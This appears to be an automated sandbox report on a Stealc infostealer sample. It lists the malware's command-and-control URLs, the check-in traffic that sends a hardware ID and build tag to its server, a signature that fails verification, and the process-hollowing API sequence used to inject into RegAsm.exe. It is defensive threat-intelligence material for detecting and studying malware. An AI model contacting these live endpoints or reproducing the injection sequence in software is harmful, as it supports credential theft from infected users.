          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://45.152.113.10/92335b4816f77e90.phpQ100%Avira URL Cloudmalware
          http://www.entrust.net/rpa030%Avira URL Cloudsafe
          http://45.152.113.10/P100%Avira URL Cloudmalware
          http://45.152.113.10/9100%Avira URL Cloudmalware
          http://45.152.113.10/t100%Avira URL Cloudmalware
          http://45.152.113.10/92335b4816f77e90.phpI100%Avira URL Cloudmalware
          http://ocsp.entrust.net020%Avira URL Cloudsafe
          http://aia.entrust.net/ts1-chain256.cer010%Avira URL Cloudsafe
          http://45.152.113.10/92335b4816f77e90.php100%Avira URL Cloudmalware
          http://ocsp.entrust.net030%Avira URL Cloudsafe
          http://45.152.113.10/D100%Avira URL Cloudmalware
          http://45.152.113.10100%Avira URL Cloudmalware
          http://crl.entrust.net/ts1ca.crl00%Avira URL Cloudsafe
          http://45.152.113.1040%Avira URL Cloudsafe
          http://45.152.113.10H0%Avira URL Cloudsafe
          http://45.152.113.10/92335b4816f77e90.php=100%Avira URL Cloudmalware
          http://crl.entrust.net/2048ca.crl00%Avira URL Cloudsafe
          https://www.entrust.net/rpa00%Avira URL Cloudsafe
          http://45.152.113.10/100%Avira URL Cloudmalware
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://45.152.113.10/92335b4816f77e90.phptrue
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/true
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://45.152.113.10/9RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/92335b4816f77e90.phpIRegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/tRegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/PRegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ocsp.entrust.net03file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10/92335b4816f77e90.phpQRegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ocsp.entrust.net02file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://www.entrust.net/rpa03file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://aia.entrust.net/ts1-chain256.cer01file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10/DRegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10HRegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/92335b4816f77e90.php=RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://crl.entrust.net/ts1ca.crl0file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.104RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.entrust.net/2048ca.crl0file.exefalse
          • Avira URL Cloud: safe
          unknown
          https://www.entrust.net/rpa0file.exefalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          45.152.113.10
          unknownRussian Federation
          138576CODECCLOUD-AS-APCodecCloudHKLimitedHKtrue
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1509593
          Start date and time:2024-09-11 20:38:06 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 16s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:4
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@4/1@0/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 20
          • Number of non-executed functions: 18
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • Exclude process from analysis (whitelisted): dllhost.exe
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: file.exe
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          45.152.113.10file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CODECCLOUD-AS-APCodecCloudHKLimitedHKfile.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          PM7K6PbAf0.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, StealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          No context
          No context
          Process:C:\Users\user\Desktop\file.exe
          File Type:CSV text
          Category:dropped
          Size (bytes):226
          Entropy (8bit):5.360398796477698
          Encrypted:false
          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
          MD5:3A8957C6382192B71471BD14359D0B12
          SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
          SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
          SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
          Malicious:false
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.974395759081579
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          • Win32 Executable (generic) a (10002005/4) 49.97%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:file.exe
          File size:210'472 bytes
          MD5:032d49a1f22f5ec2d498fcf0f4076d91
          SHA1:e076ae8c8efe84d414932f84aca43617a31bf0e0
          SHA256:e45ef7fdd1a92c5ed40b3365a895623a112ee16444cf0ebe70619cf09d8628ca
          SHA512:23dffb6ad9d873896152efccaa89eccd2dec1314bbe8bdfd52540db0f7a13738aaa15b16bb36273d53469505b70771e7c16d29e629d7296df16c555f4533ec1c
          SSDEEP:3072:YvWtdf845OWGvjeDPkCyi3E6vuseKKT14Tug55rn43LMnF+eNQP5gFkI1LKYzEO:/tdU4whvjeDwepKT1QCLGQkNEO
          TLSH:66241318E3914F71E91E497829B0B234AEE2F1C27207DBF76099C099AE47785B13716F
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I..f............................^%... ...@....@.. ....................................`................................
          Icon Hash:00928e8e8686b000
          Entrypoint:0x43255e
          Entrypoint Section:.text
          Digitally signed:true
          Imagebase:0x400000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x66E1DA49 [Wed Sep 11 17:58:33 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
          Signature Valid:false
          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
          Signature Validation Error:The digital signature of the object did not verify
          Error Number:-2146869232
          Not Before, Not After
          • 13/01/2023 01:00:00 17/01/2026 00:59:59
          Subject Chain
          • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
          Version:3
          Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
          Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
          Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
          Serial:0997C56CAA59055394D9A9CDB8BEEB56
          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x325100x4b.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x600.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x310000x2628
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x323d80x1c.text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x20000x305640x306007ee7c8254495f27c66d67561bb8f5dc2False0.9917433785529716data7.99138693606094IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rsrc0x340000x6000x600c368be690dfac09027b2fac67dad6285False0.4518229166666667data4.188787616791972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x360000xc0x200cc12ef0f3c0fbac92b8e76a40918fa2fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_VERSION0x340a00x36cdata0.454337899543379
          RT_MANIFEST0x344100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
          DLLImport
          mscoree.dll_CorExeMain
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2024-09-11T20:39:03.632416+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970745.152.113.1080TCP
          TimestampSource PortDest PortSource IPDest IP
          Sep 11, 2024 20:39:02.764170885 CEST4970780192.168.2.545.152.113.10
          Sep 11, 2024 20:39:02.910203934 CEST804970745.152.113.10192.168.2.5
          Sep 11, 2024 20:39:02.910306931 CEST4970780192.168.2.545.152.113.10
          Sep 11, 2024 20:39:02.910475969 CEST4970780192.168.2.545.152.113.10
          Sep 11, 2024 20:39:02.915282965 CEST804970745.152.113.10192.168.2.5
          Sep 11, 2024 20:39:03.460450888 CEST804970745.152.113.10192.168.2.5
          Sep 11, 2024 20:39:03.460691929 CEST4970780192.168.2.545.152.113.10
          Sep 11, 2024 20:39:03.463449001 CEST4970780192.168.2.545.152.113.10
          Sep 11, 2024 20:39:03.468513966 CEST804970745.152.113.10192.168.2.5
          Sep 11, 2024 20:39:03.632316113 CEST804970745.152.113.10192.168.2.5
          Sep 11, 2024 20:39:03.632416010 CEST4970780192.168.2.545.152.113.10
          Sep 11, 2024 20:39:04.891096115 CEST4970780192.168.2.545.152.113.10
          • 45.152.113.10
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.54970745.152.113.10805972C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          Sep 11, 2024 20:39:02.910475969 CEST88OUTGET / HTTP/1.1
          Host: 45.152.113.10
          Connection: Keep-Alive
          Cache-Control: no-cache
          Sep 11, 2024 20:39:03.460450888 CEST203INHTTP/1.1 200 OK
          Date: Wed, 11 Sep 2024 18:39:03 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Sep 11, 2024 20:39:03.463449001 CEST410OUTPOST /92335b4816f77e90.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJE
          Host: 45.152.113.10
          Content-Length: 210
          Connection: Keep-Alive
          Cache-Control: no-cache
          Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 39 32 39 44 44 44 30 41 32 45 33 34 34 31 30 34 31 38 31 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 79 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a
          Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="hwid"0C929DDD0A2E3441041814------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="build"cry------IECAFHDBGHJKFIDHJJJE--
          Sep 11, 2024 20:39:03.632316113 CEST210INHTTP/1.1 200 OK
          Date: Wed, 11 Sep 2024 18:39:03 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 8
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Data Raw: 59 6d 78 76 59 32 73 3d
          Data Ascii: YmxvY2s=


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:14:39:00
          Start date:11/09/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe"
          Imagebase:0x5e0000
          File size:210'472 bytes
          MD5 hash:032D49A1F22F5EC2D498FCF0F4076D91
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:14:39:00
          Start date:11/09/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:14:39:01
          Start date:11/09/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0x6d0000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:41.5%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:16.2%
            Total number of Nodes:37
            Total number of Limit Nodes:1
            execution_graph 270 28d0988 271 28d099b 270->271 279 28d0b2b 271->279 272 28d09b3 276 28d0a49 272->276 284 28d04e4 272->284 277 28d0a20 283 28d0b4e 279->283 280 28d0e27 280->272 281 28d0e93 VirtualProtectEx 282 28d0ed3 281->282 282->272 283->280 283->281 285 28d0e48 VirtualProtectEx 284->285 287 28d09f4 285->287 287->276 288 28d04f0 287->288 289 28d0f00 CreateThread 288->289 291 28d0fa8 289->291 291->277 292 28d0978 293 28d099b 292->293 300 28d0b2b VirtualProtectEx 293->300 294 28d09b3 295 28d04e4 VirtualProtectEx 294->295 298 28d0a49 294->298 296 28d09f4 295->296 297 28d04f0 CreateThread 296->297 296->298 299 28d0a20 297->299 300->294 312 28d0efb 313 28d0f4e CreateThread 312->313 315 28d0fa8 313->315 301 2a32429 307 2a32461 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 301->307 303 2a3263e WriteProcessMemory 304 2a32683 303->304 305 2a326c5 WriteProcessMemory Wow64SetThreadContext ResumeThread 304->305 306 2a32688 WriteProcessMemory 304->306 306->304 307->303 308 28d04d0 309 28d04d5 VirtualProtectEx 308->309 311 28d0ed3 309->311

            Callgraph

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02A32598
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A325AB
            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02A325C9
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02A325ED
            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02A32618
            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02A32670
            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02A326BB
            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02A326F9
            • Wow64SetThreadContext.KERNEL32(?,?), ref: 02A32735
            • ResumeThread.KERNELBASE(?), ref: 02A32744
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2061859383.0000000002A32000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A32000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2a32000_file.jbxd
            Similarity
            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
            • String ID: GetP$Load$aryA$ress
            • API String ID: 2687962208-977067982
            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
            • Instruction ID: f4b00fda35838ce0c0f4eddf041cf45034fadab8671a1e957758a54bd24598a2
            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
            • Instruction Fuzzy Hash: 00B1D47664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA518B94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 23 28d0b2b-28d0b7d 27 28d0c08-28d0c16 23->27 28 28d0b83-28d0b86 23->28 29 28d0c1c 27->29 30 28d0ca5-28d0cb6 27->30 32 28d0b8e-28d0bb3 28->32 31 28d0c1f-28d0c24 29->31 33 28d0cbc-28d0cc5 30->33 34 28d0e27-28d0e2e 30->34 35 28d0c2a-28d0c3a 31->35 36 28d0e31-28d0ed1 VirtualProtectEx 31->36 32->36 60 28d0bb9-28d0bda 32->60 37 28d0cce-28d0cd9 33->37 38 28d0cc7-28d0ccd 33->38 35->36 40 28d0c40-28d0c4c 35->40 53 28d0ed8-28d0eec 36->53 54 28d0ed3 36->54 37->36 39 28d0cdf-28d0ceb 37->39 38->37 43 28d0ced-28d0cf3 39->43 44 28d0cf4-28d0cfb 39->44 45 28d0c4e-28d0c54 40->45 46 28d0c55-28d0c5c 40->46 43->44 44->36 47 28d0d01-28d0d0b 44->47 45->46 46->36 48 28d0c62-28d0c6c 46->48 47->36 51 28d0d11-28d0d1b 47->51 48->36 52 28d0c72-28d0c7c 48->52 51->36 55 28d0d21-28d0d27 51->55 52->36 56 28d0c82-28d0c88 52->56 54->53 55->36 58 28d0d2d-28d0d39 55->58 56->36 59 28d0c8e-28d0c9f 56->59 58->36 62 28d0d3f-28d0d51 58->62 59->30 59->31 60->36 61 28d0be0-28d0bee 60->61 61->36 63 28d0bf4-28d0c02 61->63 64 28d0d5b-28d0d87 62->64 65 28d0d53-28d0d5a 62->65 63->27 63->28 68 28d0d89-28d0d8e 64->68 69 28d0d96-28d0da0 64->69 65->64 68->69 69->36 70 28d0da6-28d0daf 69->70 70->36 71 28d0db5-28d0dd4 70->71 72 28d0dd6-28d0ddb 71->72 73 28d0de3-28d0ded 71->73 72->73 73->36 74 28d0def-28d0df4 73->74 74->36 75 28d0df6-28d0e21 74->75 75->33 75->34
            APIs
            • VirtualProtectEx.KERNELBASE(?,03A33594,00000040,?,?), ref: 028D0EC4
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 9f859e1efa17665fef6d0e68863a2ecd127100ccd33f5606e3aa945df1b1460a
            • Instruction ID: b37ed97ad7d0ed60d753f1d162836b794b4b389ed6fef1d51a7058330835c020
            • Opcode Fuzzy Hash: 9f859e1efa17665fef6d0e68863a2ecd127100ccd33f5606e3aa945df1b1460a
            • Instruction Fuzzy Hash: 64C1A378A142598FCB01CFA8C880AADFFF1FF49315F548599D858EB356C374A845CB90

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 78 28d04f0-28d0f5a 81 28d0f5c-28d0f68 78->81 82 28d0f6a-28d0fa6 CreateThread 78->82 81->82 83 28d0faf-28d0fc3 82->83 84 28d0fa8-28d0fae 82->84 84->83
            APIs
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 028D0F99
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: CreateThread
            • String ID:
            • API String ID: 2422867632-0
            • Opcode ID: 1671b99f277bd33e3ff7c63abf12e8eb194ef75a500bc4620daff4f2a6dc7a7a
            • Instruction ID: 0a8520ea462ac27dff83784d2ecc7d526240ee6152ab654528455d0a1542716c
            • Opcode Fuzzy Hash: 1671b99f277bd33e3ff7c63abf12e8eb194ef75a500bc4620daff4f2a6dc7a7a
            • Instruction Fuzzy Hash: AD21F0B9D002499FCB10CF9AD984ADEBBF4FB48310F20842AE919E7350D374A954CFA5

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 86 28d0efb-28d0f5a 88 28d0f5c-28d0f68 86->88 89 28d0f6a-28d0fa6 CreateThread 86->89 88->89 90 28d0faf-28d0fc3 89->90 91 28d0fa8-28d0fae 89->91 91->90
            APIs
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 028D0F99
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: CreateThread
            • String ID:
            • API String ID: 2422867632-0
            • Opcode ID: 1fc2f611cc5e88127c78f8260f23eaef5be5bf67de715cfadb684b859e373c85
            • Instruction ID: 83810e996bbea881db23c32819a4ae57a87040181864af7239cc459094866c33
            • Opcode Fuzzy Hash: 1fc2f611cc5e88127c78f8260f23eaef5be5bf67de715cfadb684b859e373c85
            • Instruction Fuzzy Hash: 6C21F2B5D012499FCB10CF9AD984ADEBBF4FB49310F20842AE919A7350D375A954CFA1

            Control-flow Graph

            • Executed
            • Not Executed
